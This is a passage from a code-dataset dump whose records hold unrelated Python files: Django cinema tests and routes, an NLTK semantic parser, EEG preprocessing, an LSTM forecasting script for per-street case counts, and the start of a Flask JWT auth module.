must_resolve:\n raise e\n e = Entity(\n identifier=self.identifier,\n generics=self.generics,\n ports=resolved_ports,\n uses=resolved_uses,\n )\n return e\n\n\nclass Entity(object):\n '''\n An entity with all types and constants in the ports resolved.\n '''\n\n resolved = True\n\n def __init__(self, identifier, generics, ports, uses):\n self.identifier = identifier\n self.generics = generics\n self.ports = ports\n self.uses = uses\n\n def __str__(self):\n return 'Entity({})'.format(self.identifier)\n\n def __repr__(self):\n return str(self)\n\n def inputs_to_slv(self, inputs, generics):\n slvs = [] \n for port in self.ports.values():\n if (port.direction == 'in') and (port.name not in CLOCK_NAMES):\n d = inputs.get(port.name, None)\n if d is None:\n w = typs.make_substitute_generics_function(generics)(port.typ.width)\n o = 'U' * symbolic_math.get_value(w)\n else:\n o = port.typ.to_slv(d, generics)\n slvs.append(o)\n slv = ''.join(reversed(slvs))\n return slv\n\n def ports_from_slv(self, slv, generics, direction):\n pos = 0\n outputs = {}\n for port in self.ports.values():\n if (port.direction == direction) and (port.name not in CLOCK_NAMES):\n w = typs.make_substitute_generics_function(generics)(port.typ.width)\n width = symbolic_math.get_value(w)\n intwidth = int(width)\n assert(width == intwidth)\n if pos == 0:\n piece = slv[-intwidth:]\n else:\n piece = slv[-pos-intwidth: -pos]\n pos += intwidth\n o = port.typ.from_slv(piece, generics)\n outputs[port.name] = o\n return outputs\n\n def outputs_from_slv(self, slv, generics):\n slv = slv.strip()\n data = self.ports_from_slv(slv, generics, 'out')\n return data\n\n def inputs_from_slv(self, slv, generics):\n slv = slv.strip()\n data = self.ports_from_slv(slv, generics, 'in')\n return data\n","sub_path":"slvcodec/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482362116","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.main_app, name='main_app'),\n url(r'orders/$', views.orders, name='orders'),\n url(r'dicts/$', views.dicts, name='dicts'),\n url(r'dicts/services/$', views.dict_services_list, name='dict_services_list'),\n url(r'dicts/clients/$', views.dict_clients_list, name='dict_clients_list'),\n url(r'dicts/clients/(?P[0-9]+)/$', views.dict_clients_detail, name='dict_clients_detail'),\n]","sub_path":"barbershopoffice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229714193","text":"import nltk\nimport sys\nfrom nltk import load_parser\nimport subprocess\n\n#sentence = 'Angus gives a bone to every dog'.split()\n\n#sentence = 'You are imagining things'.split()\n#sentence = 'There is a price on my head'.split()\nsentence = 'your big opportunity is flying out of here'.split()\n\nsentence2 = str(sys.argv[1]).split()\n\ncp = load_parser('cfgrammar.fcfg', trace=0)\n\n\nfor tree in cp.parse(sentence2):\n print(tree.label()['SEM'])\n #for Java\n file = open(\"../../Java/Traduttore/src/fol.txt\", \"w\")\n file.write(str(tree.label()['SEM']))\n file.close()\n\n #for Python\n file = open(\"./src/fol.txt\", \"w\")\n file.write(str(tree.label()['SEM']))\n file.close()\n break\n\n\nsubprocess.call(['java', '-jar', '../../Java/Traduttore/Traduttore.jar'])\n\n\n\n","sub_path":"Python/TLN-Mazzei/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"124065022","text":"from django.test import TestCase, Client\nfrom django.test.client import RequestFactory\nfrom .views import *\nfrom .models import Movie\nfrom django.core.urlresolvers import reverse\nfrom datetime import datetime\n\nclass Views_Test(TestCase):\n\n def setUp(self):\n self.movies = [\n Movie.objects.create(title = \"Film\", genere = \"komedia\", time = 120, text = \"nannanaa\"),\n Movie.objects.create(title = \"Siema\", genere = \"akcja\", time = 110, text = \"nana\"),\n Movie.objects.create(title = \"Komedia\", genere = \"komedia\", time = 130, text = \"nanna\")\n ]\n self.movie = Movie.objects.create(title = \"Fajny\", genere = \"Komedia\", time = 100, text = \"annaan\")\n\n self.room = Room.objects.create(seat_count = 20, room_number = 2)\n self.showing = Showing.objects.create(\n movie = self.movies[0],\n # Do zmiany - niech bę∂zie godzina seansu zamiast now()\n time = datetime.now(),\n room = self.room\n )\n \n self.client = Client()\n\n def test_movie_list(self):\n url = reverse('movie_list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/movie_list.html')\n\n def test_movie_list_dos(self):\n url = reverse('movie_list')\n rf = RequestFactory()\n request = rf.get(url)\n\n movies = Movie.objects.order_by('title')\n expected_response = render(request, 'cinema/movie_list.html', {'movies': movies})\n\n response = movie_list(request)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.content, expected_response.content)\n \n def test_reservation_form(self):\n url = reverse('reservation_new', kwargs={\"pk\": self.showing.pk})\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/reservation_new.html')\n\n\n def test_reservation_form_showing_not_exist(self):\n url = reverse('reservation_new', kwargs={\"pk\": 0})\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, 404)\n\n def test_showing_form(self):\n url = reverse('showing_new', kwargs={\"pk\": self.movies[0].pk})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/showing_new.html')\n\n def test_movie_detail(self):\n url = reverse('movie_detail', kwargs={\"pk\": self.movie.pk})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/movie_detail.html')\n\n def test_showing_delete(self):\n url = reverse('showing_delete', kwargs={\"pk\": self.showing.pk})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/showing_delete_success.html')\n\n def test_showing_confirm_delete(self):\n url = reverse('showing_confirm_delete', kwargs={\"pk\": self.showing.pk})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/showing_remove.html')\n\n def test_reservation_new_form_post(self):\n url = reverse('reservation_new', kwargs={\"pk\": self.showing.pk})\n response = self.client.post(url, {'seat_count': 2, 'email': 'katarzyna@op.pl'})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/reservation_success.html')\n\n def test_showing_new_form_post(self):\n url = reverse('showing_new', kwargs={\"pk\": self.movies[0].pk})\n response = self.client.post(url, {'time': '2018-12-12 10:00', 'room': self.room.pk})\n self.assertEqual(response.status_code, 302)\n self.assertRedirects(response, reverse('movie_list'))\n\n def test_reservation_new_form_empty_email(self):\n url = reverse('reservation_new', kwargs={\"pk\": self.showing.pk})\n response = self.client.post(url, {})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'cinema/reservation_new.html')\n\n","sub_path":"cinema/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77009557","text":"import pylab as plt\nfrom sklearn.datasets import fetch_mldata\nimport numpy as np\n\n\ndef save(image, name):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n imgplot = ax.imshow(image, cmap=plt.cm.Greys)\n imgplot.set_interpolation('nearest')\n ax.xaxis.set_ticks_position('top')\n ax.yaxis.set_ticks_position('left')\n plt.imsave(name)\n # plt.savefig(name)\n\nmnist = fetch_mldata('MNIST original', data_home=\".\")\ny = mnist.target\nX = - mnist.data.reshape(len(y), 28, 28) + 255\n\ncounter = np.zeros(10)\nfrom itertools import izip\nfor image, label in izip(X, y):\n label = int(label)\n plt.imsave(\"%d_%d.png\" % (label, counter[label]), image, cmap=plt.cm.gray)\n counter[label] += 1\n","sub_path":"download_mnist.py","file_name":"download_mnist.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"437880533","text":"#442. Find All Duplicates in an Array. Medium. 62%.\n\n#Given an array of integers, 1 ≤ a[i] ≤ n (n = size of array), some elements appear twice and others appear once.\n#Find all the elements that appear twice in this array.\n#Could you do it without extra space and in O(n) runtime?\n\nclass Solution:\n def findDuplicates(self, nums: List[int]) -> List[int]:\n nums2 = []\n char = {}\n for i in nums:\n if i in char:\n nums2.append(i)\n else:\n char[i] = True\n return(nums2)\n \n# 2min\n","sub_path":"089.py","file_name":"089.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519366780","text":"import numpy as np\nfrom sklearn import preprocessing\n\n\n# Averages selected time intervals in each out_features[i][j]\n# that have been specified using param.intervals.\n# Returns 2D feature vectors n_of_examples x (number_of_time_windows x number_of_channels)\ndef windowed_means(out_features, param):\n # in all feature vectors\n output_features = []\n for i in range(out_features.shape[0]):\n feature = []\n # for all EEG channels\n for j in range(out_features.shape[1]):\n time_course = out_features[i][j]\n for k in range(param.intervals.shape[0]):\n borders = param.intervals[k] * param.sampling_fq\n feature.append(np.average(time_course[int(borders[0] - 1):int(borders[1] - 1)]))\n output_features.append(feature)\n# print(np.shape(output_features))\n return preprocessing.scale(np.array(output_features), axis=1)\n\n\n# Add a singleton dimension to enable CNN Keras classification\ndef cnn_reshape(out_features):\n # reshape the data to add a singleton dimension\n out_features = out_features.reshape(out_features.shape[0], out_features.shape[1], out_features.shape[2], 1)\n return out_features\n\n\n# From out_features, remove all epochs with any channel\n# exceeding ampl_threshold in the absolute value.\ndef reject_amplitude(out_features, out_labels, param):\n # in all feature vectors\n output_features = []\n retain_targets = []\n for i in range(out_features.shape[0]):\n feature = []\n reject = False\n # for all EEG channels\n for j in range(out_features.shape[1]):\n if np.max(np.absolute(out_features[i][j])) > param.rej_threshold:\n reject = True\n if not reject:\n output_features.append(out_features[i])\n retain_targets.append(not reject)\n output_features = np.array(output_features)\n if param.verbose:\n print('Rejected: ', (1 - output_features.shape[0] / out_features.shape[0]) * 100, ' %.')\n return output_features, out_labels[retain_targets, :]\n\n\n# Averages every N trials in EEG data structure\n# out_features - EEG feature vectors\n# averaging - N - number of trials to average together\ndef neighbor_average_all(out_features, out_labels, averaging_factor):\n if averaging_factor <= 1:\n return [out_features, out_labels]\n\n # separate only targets/non-target features\n out_t_features = out_features[out_labels[:, 0] == 1, :]\n out_n_features = out_features[out_labels[:, 1] == 1, :]\n\n # ensemble average targets and non-targets features\n out__t_features_avg = average(out_t_features, averaging_factor)\n out__n_features_avg = average(out_n_features, averaging_factor)\n\n # create corresponding labels\n out_t_labels = np.tile(np.array([1, 0]), (out__t_features_avg.shape[0], 1))\n out_n_labels = np.tile(np.array([0, 1]), (out__n_features_avg.shape[0], 1))\n\n # connect target/non-target features/labels\n out_labels = np.vstack((out_t_labels, out_n_labels))\n out_features = np.concatenate((out__t_features_avg, out__n_features_avg), axis=0)\n\n return [out_features, out_labels]\n\n\n# Average features only by a certain factor\ndef average(out_features, averaging_factor):\n out_eeg_data = []\n for trial in range(0, out_features.shape[0] - 1, averaging_factor):\n avg_fv = np.average(out_features[trial:(trial + averaging_factor), :], axis=0)\n out_eeg_data.append(avg_fv)\n return np.array(out_eeg_data)","sub_path":"main/pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169491383","text":"# -*- coding: utf-8 -*-\n\n#from __future__ import print_function\n#from keras.models import Sequential\nimport keras.backend as K\nfrom keras.callbacks import LearningRateScheduler\nimport shutil\nfrom keras.layers.core import Dense, Activation, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers import Input, Embedding, merge\nfrom keras.utils import np_utils\nfrom keras.models import Model\nimport pandas as pd\nimport numpy as np\nfrom keras.optimizers import Adam\nfrom keras.regularizers import l2\nimport csv\n#import random \nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.pylab import mpl\nfrom matplotlib.font_manager import _rebuild\n#from sklearn import preprocessing\n#如需进行数据归一化则写入下一行代码\nfrom sklearn.preprocessing import MinMaxScaler\n#=====================================================================\nPARAMS = [[0.001,50,10,1],[0.001,50,10,8] ,[0.001,50,10,32],\n [0.001,10,10,16],[0.001,100,10,16],[0.001,500,10,16]]\nfor PARAM_NUM in range(3,8):\n #PARAM_NUM = 3 #在这里输���参数号\n NAME = u\"无照经营\"\n FILE_NAME = NAME+\"-所有街道数据.csv\"\n F_NAME = u\"../图表/LSTM图表/分站点预测/参数\"+str(PARAM_NUM)+\"/\"+NAME+\"/\"\n #=====================================================================\n #将下面这个参数从1开始跑,\n #比如num_site=1跑一次,num_site=2跑一次,num_site=3跑一次。。。以此类推,直到系统提示“本文件所有站点预测完毕”为止\n\n #num_site=12\n\n\n CURRENT_PARAMS = PARAMS[PARAM_NUM-2]\n #=====================================================================\n #my_lr=0.001 #初始学习率\n my_lr=CURRENT_PARAMS[0]\n #my_node=50 #LSTM层的节点数\n my_node = CURRENT_PARAMS[1]\n #delay=10 #根据前delay个数据预测下一个\n delay=CURRENT_PARAMS[2]\n #my_batch_size=1 #batch_size\n my_batch_size=CURRENT_PARAMS[3]\n\n #=====================================================================\n os.makedirs(F_NAME)\n os.makedirs(u\"../LSTM分站点输出预测数据文件/参数\" + str(PARAM_NUM) + \"/\" + NAME + \"/\")\n os.makedirs(u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+u'极端数据图表/')\n\n df=pd.read_csv(FILE_NAME,encoding='gbk')\n #df=pd.read_csv(FILE_NAME)\n #=================================常量的定义或声明====================================\n NUM_ROW = df.shape[0] #数据行数=表格行数-1(减表头)\n ROW=48 #如果报错尝试这个 将288变为相应的行数\n DATA_SIZE=48 #数据量 每个街道有DATA_SIZE个月的数据\n SITE_NUM=int(NUM_ROW/DATA_SIZE)#站点个数\n SITE_SIZE=1#分站点预测,所以只能等于1,这是最简便的更改方式\n #if(num_site>SITE_NUM):\n # print(\"本文件所有站点预测完毕\")\n # exit(0)\n for num_site in range(1,SITE_NUM+1):\n\n hourlyData=df.values[DATA_SIZE*(num_site-1):DATA_SIZE*num_site,3]\n\n\n hourlyData=hourlyData.astype('float32')#写成科学计数法(float32)\n Mon=df.values[:,2]#获得表格所有月份Mon\n\n\n X=[] #输入 根据delay个数据成一组作为X,得到输出y (一个X有delay个数据,有多组X,所以是二维的,再加上多个街道,变成三维的了)\n y=[] #输出\n pre=1 #不知道这是干啥的\n\n #设置绘图时的中文显示(需安装黑体字体)\n _rebuild()\n mpl.rcParams['font.sans-serif']=[u'SimHei']\n mpl.rcParams['axes.unicode_minus']=False\n #=================================================================================\n\n #输出一下得到的案件量个数\n print('aqi data length:', len(hourlyData))\n\n #立案量,转换成SITE_SIZE行DATA_SIZE列,每行代表不同的街道,每个街道有DATA_SIZE个月的数据\n hourlyData = hourlyData.reshape(SITE_SIZE,DATA_SIZE)\n\n #转置 现在每一列代表不同的街道了\n hourlyData = hourlyData.T\n\n #====================================以下为对训练样本的预处理 归一化、打乱、分训练测试组等================================\n #在进行运算之前可以对数据进行归一化,进而降低loss\n scaler = MinMaxScaler(feature_range=(0.01, 1))#这个归一化也有影响 比如要是(0,1)就无法拟合\n #scaler = MinMaxScaler()#这种有的就无法拟合\n hourlyData = scaler.fit_transform(hourlyData)\n\n #此处应该是将时间序列转换为x,y的监督学习问题\n for d in range(delay,len(hourlyData)-pre+1):\n X_one=hourlyData[d-delay:d,:]#二维\n X_one=X_one.reshape((1,X_one.shape[0],X_one.shape[1]))#转三维 1页1行10列\n y_one=hourlyData[d,:]\n X.append(X_one)\n y.append(y_one)\n X=np.array(X).reshape((len(X),delay,SITE_SIZE)) #reshape页、行、列 三维\n y=np.array(y) #二维\n\n\n '''\n print(\"X\")\n print(X)\n print(\"y\")\n print(y)\n '''\n '''\n #shuffle data\n #随机排列x,y,Mon,但一一对应\n random.seed(10)\n random.shuffle(X)\n random.seed(10)\n random.shuffle(y)\n random.seed(10)\n random.shuffle(Mon)\n \n #split dataset\n #将数据分成训练组和测试组 前80%的数据作为训练,后20%的数据作为测试\n trLen=int(0.8*X.shape[0])\n train_set_x=X[:trLen,:]\n train_set_y=y[:trLen]\n test_set_x = X[trLen:,:]\n test_set_y=y[trLen:]\n '''\n\n\n Mon = np.linspace(delay+1,DATA_SIZE,DATA_SIZE-delay)\n #Mon = np.linspace(1,DATA_SIZE,DATA_SIZE)\n #shuffle data\n\n '''\n np.random.seed(10)\n np.random.shuffle(X)\n np.random.seed(10)\n np.random.shuffle(y)\n np.random.seed(10)\n np.random.shuffle(Mon)\n '''\n #shuffle data\n index=np.arange(DATA_SIZE-delay)\n np.random.shuffle(index)\n X=X[index,:,:]\n y=y[index]\n Mon=Mon[index]\n\n\n #split dataset\n trLen=int(0.8*X.shape[0])\n train_set_x=X[:trLen,:]\n train_set_y=y[:trLen]\n test_set_x = X[trLen:,:]\n test_set_y=y[trLen:]\n\n\n\n '''\n print(\"train_set_x\")\n print(train_set_x)\n print(\"train_set_y\")\n print(train_set_y)\n print(\"test_set_x\")\n print(test_set_x)\n print(\"test_set_y\")\n print(test_set_y)\n '''\n\n #====================================================================\n\n #==========================================本模块采用LSTM建模================================================\n # build the model: 2 stacked LSTM\n print('Build model...')\n input_shape = (delay,SITE_SIZE) #每delay个数据预测一个 输入格式为delay行SITE_SIZE列的矩阵\n main_input = Input(shape=input_shape, name='main_input')\n\n rnn_out = LSTM(my_node, return_sequences=True,consume_less = 'gpu')(main_input)\n x = LSTM(my_node,consume_less = 'gpu')(rnn_out)\n\n #4、在后面连接一个隐层,输入为rnn输出和时间信息,采用sigmoid激活\n x = Dense(500, activation='relu')(x)\n #5、添加一个dropout层防止过拟合\n x = Dropout(0.5)(x)\n #6、后面添加一个隐层,采用relu作为激活函数,根据relu的特性,可以直接输出实数\n #x = Dense(100, activation='relu')(x)\n #7、继续使用relu输出最终预测值\n loss = Dense(SITE_SIZE, activation='relu', name='main_output')(x)\n\n #使用刚才创建的图生成模型\n model = Model(input=[main_input], output=[loss])\n\n solver = Adam(lr=my_lr) #学习率为0.001 一条直线的有可能是学习率过大的缘故\n model.compile(optimizer=solver,\n loss={'main_output': 'mape'} ) #optimizer优化器选择Adam 回头可以再尝试一下RMSprop\n #损失函数loss用的mape?\n\n #=============================================================================================\n\n\n\n #定义精度计算公式\n def cal_acc(pre,real):\n pre = scaler.inverse_transform(pre)\n real = scaler.inverse_transform(real)\n [m,n]=pre.shape\n pre=pre.reshape(m*n,1)\n real=real.reshape(m*n,1)\n acc=np.zeros((4,1))\n acc[0]=np.sqrt(((pre-real)**2).mean())\n acc[1]=(abs(pre-real)).mean()\n acc[2]=(abs(pre-real)/real).mean()\n acc[3]=1-sum((pre-real)**2)/sum((abs(pre-real.mean())+abs(real-real.mean()))**2)\n return acc.transpose()\n\n #把模型写入jason文件中,权重记录在.hdf5中?因为每次的权中事随机的\n model_json = model.to_json()\n model_path = '$8.json'\n model_weight_path = '$8_weights.hdf5'\n with open(model_path, \"w\") as json_file:\n json_file.write(model_json)\n\n #迭代次数为100次\n epoches = 80\n #生成epoches行4列的零矩阵\n acc_tr=np.zeros((epoches,4))\n acc_t=np.zeros((epoches,4))\n history = []\n\n #生成epoches行2列的零矩阵\n #msemae_tr = np.zeros((epoches,2))\n #msemae_t = np.zeros((epoches,2))\n\n #================================================================训练LSTM=====================================\n '''\n def scheduler(epoch):\n # 每隔50个epoch,学习率减小为原来的1/10\n if epoch % 50 == 0 and epoch != 0:\n lr = K.get_value(model.optimizer.lr)\n K.set_value(model.optimizer.lr, lr * 0.1)\n print(\"lr changed to {}\".format(lr * 0.1))\n return K.get_value(model.optimizer.lr)\n '''\n #开始迭代\n for epoch in range(epoches):\n print()\n print('-' * 50)\n print('epoch', epoch)\n #reduce_lr = LearningRateScheduler(scheduler)\n\n if epoch==50:\n solver = Adam(lr=my_lr/10)#降低学习率\n model.compile(optimizer=solver,\n loss={'main_output': 'mape'} )\n '''\n hist = model.fit({'main_input': train_set_x},\n {'main_output': train_set_y},validation_data=(\n {'main_input': test_set_x, },\n {'main_output': test_set_y}\n ),verbose = 1,\n nb_epoch=10, batch_size=16,callbacks=[reduce_lr]) #batch_size待确定 nb_epoch是训练数据遍历的次数\n '''\n hist = model.fit({'main_input': train_set_x},\n {'main_output': train_set_y},validation_data=(\n {'main_input': test_set_x, },\n {'main_output': test_set_y}\n ),verbose = 1,\n nb_epoch=10, batch_size=my_batch_size)\n acc_tr[epoch,:]=cal_acc(model.predict([train_set_x]),train_set_y)\n acc_t[epoch,:]=cal_acc(model.predict([test_set_x]),test_set_y)\n #msemae_tr[epoch,:] = cal_msemae_tr()\n #msemae_t[epoch,:] = cal_msemae_t()\n history.extend(hist.history.values())\n history = np.array(history).reshape((-1,1))\n if model_weight_path:\n if os.path.exists(model_weight_path):\n os.remove(model_weight_path)\n model.save_weights(model_weight_path) # eg: model_weight.h5\n #========================================================================================================\n\n #输出精度acc\n a=[acc_tr[:,3],acc_t[:,3]]\n a=np.array(a)\n a=a.T\n\n #定义预测值\n trainPredict = model.predict(train_set_x)\n testPredict = model.predict(test_set_x)\n\n #反归一化:如在开始时进行了归一化则取消以下代码的注释\n hourlyData = scaler.inverse_transform(hourlyData)\n trainPredict = scaler.inverse_transform(trainPredict)\n train_set_y = scaler.inverse_transform(train_set_y)\n testPredict = scaler.inverse_transform(testPredict)\n test_set_y = scaler.inverse_transform(test_set_y)\n\n #将数据按站点分为SITE_SIZE组\n site_names=[] #站点数据列表\n site_cnames=[] #站点名字列表\n #site_cnames.append(df.at[(num_site-1)*DATA_SIZE, u'事发街道'])\n site_cnames.append(\"站点\"+str(num_site))#隐藏站点名称\n site_names.append(hourlyData[:,0])\n\n\n #作图:立案量vs时间\n plt.figure(figsize=(16,9))\n layout_num = 0\n for i in range(0,SITE_SIZE):\n if(layout_num==1):\n layout_num=0\n plt.figure(figsize=(16, 9))\n plt.suptitle(u'各地点按月立案数量')\n subplot = plt.subplot(1, 1, layout_num + 1)\n site = site_names[i]\n plt.plot(site_names[i])\n plt.xlabel(u'时间')\n plt.ylabel(u'立案量')\n plt.legend(labels=[u'立案量'],loc = 'best')\n subplot.set_title(str(NAME)+'-'+site_cnames[i]+u\"-当前打乱的原始数据\")\n plt.tight_layout()\n layout_num = layout_num + 1\n plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-当前打乱的原始数据.png\")\n\n #作图:精度vs迭代次数\n plt.figure(figsize=(16,9))\n #x2 = np.linspace(1,100,len(a[:,0]))\n #x21 = np.linspace(1,100,len(a[:,1]))\n plt.plot(a[:,0])\n plt.plot(a[:,1])\n plt.xlabel(u'迭代次数')\n plt.ylabel(u'精度')\n plt.title(str(NAME)+'-'+str(site_cnames[0])+u'-测试/训练精度与时间对比')\n plt.legend(labels = [u'训练精度',u'测试精度'],loc ='best')\n plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-精度.png\")\n\n #作图:真实值&预测值vs时间\n #训练数据组\n\n plt.figure(figsize=(16,9))\n #plt.suptitle(u'分站点预测/实际值对比(训练数据)')\n layout_num = 0\n for i in range(0,SITE_SIZE):\n if(layout_num==6):\n layout_num=0\n plt.figure(figsize=(16, 9))\n plt.suptitle(u'分站点预测/实际值对比(训练数据)')\n subplot = plt.subplot(1, 1, layout_num + 1)\n #site = site_names[i]\n plt.plot(trainPredict[:, i])\n plt.plot(train_set_y[:, i])\n plt.xlabel(u'数据编号')\n plt.ylabel(u'数值')\n plt.legend(labels=[u'预测数据',u'实际数据'])\n subplot.set_title(str(NAME)+'-'+site_cnames[i]+u'-预测/实际值对比(训练数据)')\n plt.tight_layout()\n layout_num = layout_num + 1\n plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-训练预测.png\")\n\n #测试数据组\n plt.figure(figsize=(16,9))\n #plt.suptitle(u'分站点预测/实际值对比(测试数据)')\n layout_num = 0\n for i in range(0,SITE_SIZE):\n if(layout_num==6):\n layout_num=0\n plt.figure(figsize=(16, 9))\n plt.suptitle(u'分站点预测/实际值对比(测试数据)')\n subplot = plt.subplot(1, 1, layout_num + 1)\n #site = site_names[i]\n plt.plot(testPredict[:, i])\n plt.plot(test_set_y[:, i])\n plt.xlabel(u'数据编号')\n plt.ylabel(u'数值')\n plt.legend(labels=[u'预测数据',u'实际数据'])\n subplot.set_title(str(NAME)+'-'+site_cnames[i]+u'-预测/实际值对比(测试数据)')\n plt.tight_layout()\n layout_num=layout_num+1\n plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-测试预测.png\")\n #作图:MSE与MAE MAPE\n plt.figure(figsize=(16, 9))\n mseTrain = plt.subplot(321)\n maeTrain = plt.subplot(322)\n mseTest = plt.subplot(323)\n maeTest = plt.subplot(324)\n\n mapeTrain = plt.subplot(325)\n mapeTest = plt.subplot(326)\n\n\n mse=[acc_tr[:,0],acc_t[:,0]]\n mse=np.array(mse)\n mse=mse.T\n\n mae=[acc_tr[:,1],acc_t[:,1]]\n mae = np.array(mae)\n mae = mae.T\n\n mape=[acc_tr[:,2],acc_t[:,2]]\n mape = np.array(mape)\n mape = mape.T\n\n if mape[-1,-1]<=0.2:\n shutil.copyfile(F_NAME+NAME+u'-站点'+str(num_site)+'-当前打乱的原始数据.png', u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+u'极端数据图表/'+'【准】'+\n NAME+'-站点'+str(num_site)+'-当前打乱的原始数据.png')\n f = open(u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+'-分站点结果分析.txt','a')\n f.write('\\n站点'+str(num_site)+'准')\n elif mape[-1,-1]>=0.5:\n shutil.copyfile(F_NAME+NAME+u'-站点'+str(num_site)+'-当前打乱的原始数据.png', u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+u'极端数据图表/'+'【不准】'+\n NAME+'-站点'+str(num_site)+'-当前打乱的原始数据.png')\n f = open(u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+'-分站点结果分析.txt','a')\n f.write('\\n站点' + str(num_site) + '不准')\n\n msemaeList = [mseTrain,maeTrain,mseTest,maeTest,mapeTrain,mapeTest]\n msemaeData = [mse[:,0],mae[:,0],mse[:,1],mae[:,1],mape[:,0],mape[:,1]]\n msemaeLabels = [u'训练MSE',u'训练MAE',u'测试MSE',u'测试MAE','训练MAPE','测试MAPE']\n def plot4(i):\n plt.plot(msemaeData[i])\n plt.xlabel(u'迭代次数')\n plt.ylabel(u'误差值')\n for i in range(0,6):\n plt.sca(msemaeList[i])\n plot4(i)\n plt.legend(labels = [msemaeLabels[i]],loc = 'best')\n msemaeList[i].set_title(str(NAME)+'-'+str(site_cnames[0])+msemaeLabels[i])\n plt.suptitle(str(NAME)+'-'+str(site_cnames[0])+u'-训练与测试MSE/MAE/MAPE对比')\n plt.tight_layout()\n\n plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-误差.png\")\n #plt.show()\n\n\n '''\n #将预测数据输出为csv文件\n months = np.linspace(delay+1,DATA_SIZE,DATA_SIZE-10)\n months = np.array(months)\n with open(u\"输出文件:\"+FILE_NAME, \"w\", newline=\"\",encoding=\"utf-8-sig\") as datacsv:\n csvwriter = csv.writer(datacsv, dialect=(\"excel\"))\n first_row = [u'月份/地点']\n for i in range(0,SITE_SIZE):\n first_row.append(site_cnames[i]+u'预测')\n first_row.append(site_cnames[i]+u'实际')\n csvwriter.writerow(first_row)\n for i in range(0, trLen):\n train_row = [months[i]]\n for j in range(0, SITE_SIZE):\n train_row.append(trainPredict[i, j])\n train_row.append(train_set_y[i, j])\n csvwriter.writerow(train_row)\n for i in range(0, DATA_SIZE-trLen-10):\n test_row = [months[i + trLen]]\n for j in range(0,SITE_SIZE):\n test_row.append(testPredict[i,j])\n test_row.append(test_set_y[i,j])\n csvwriter.writerow(test_row)\n '''\n\n\n #将预测数据输出为csv文件\n #months = np.linspace(delay+1,num_Data,num_Data-10)\n months = Mon\n months = np.array(months)\n\n with open(u\"../LSTM分站点输出预测数据文件/参数\"+str(PARAM_NUM)+\"/\"+NAME+\"/预测输出:\"+NAME+\"-站点\"+str(num_site)+'.csv', \"w\", newline=\"\",encoding=\"utf-8-sig\") as datacsv:\n csvwriter = csv.writer(datacsv, dialect=(\"excel\"))\n first_row = [u'月份/地点']\n for i in range(0,SITE_SIZE):\n first_row.append(site_cnames[i]+u'预测')\n first_row.append(site_cnames[i]+u'实际')\n csvwriter.writerow(first_row)\n for i in range(0, trLen):\n train_row = [months[i]]\n for j in range(0, SITE_SIZE):\n train_row.append(trainPredict[i, j])\n train_row.append(train_set_y[i, j])\n csvwriter.writerow(train_row)\n for i in range(0, DATA_SIZE-trLen-delay):\n test_row = [months[i + trLen]]\n for j in range(0,SITE_SIZE):\n test_row.append(testPredict[i,j])\n test_row.append(test_set_y[i,j])\n csvwriter.writerow(test_row)\n\n\n\n","sub_path":"code/LSTM(分站点预测-自动步骤1).py","file_name":"LSTM(分站点预测-自动步骤1).py","file_ext":"py","file_size_in_byte":20689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"74452864","text":"from flask_restful import Resource\nfrom flask import request\nfrom schema.user_schema import UserSchema,registerSchema\nfrom unitity.unitity import Tool,Model\nfrom database.user import UserModel,RevokedTokenModel\nfrom passlib.hash import pbkdf2_sha256 as sha256\nfrom flask_jwt_extended import (create_access_token, create_refresh_token, jwt_required, jwt_refresh_token_required, get_jwt_identity, get_raw_jwt)\n\nuser_schema = UserSchema(many=False)\nregister_schema = registerSchema(many=False)\nencrypt = Model()\ngetdata = Tool()\n\nclass TokenRefresh(Resource):\n 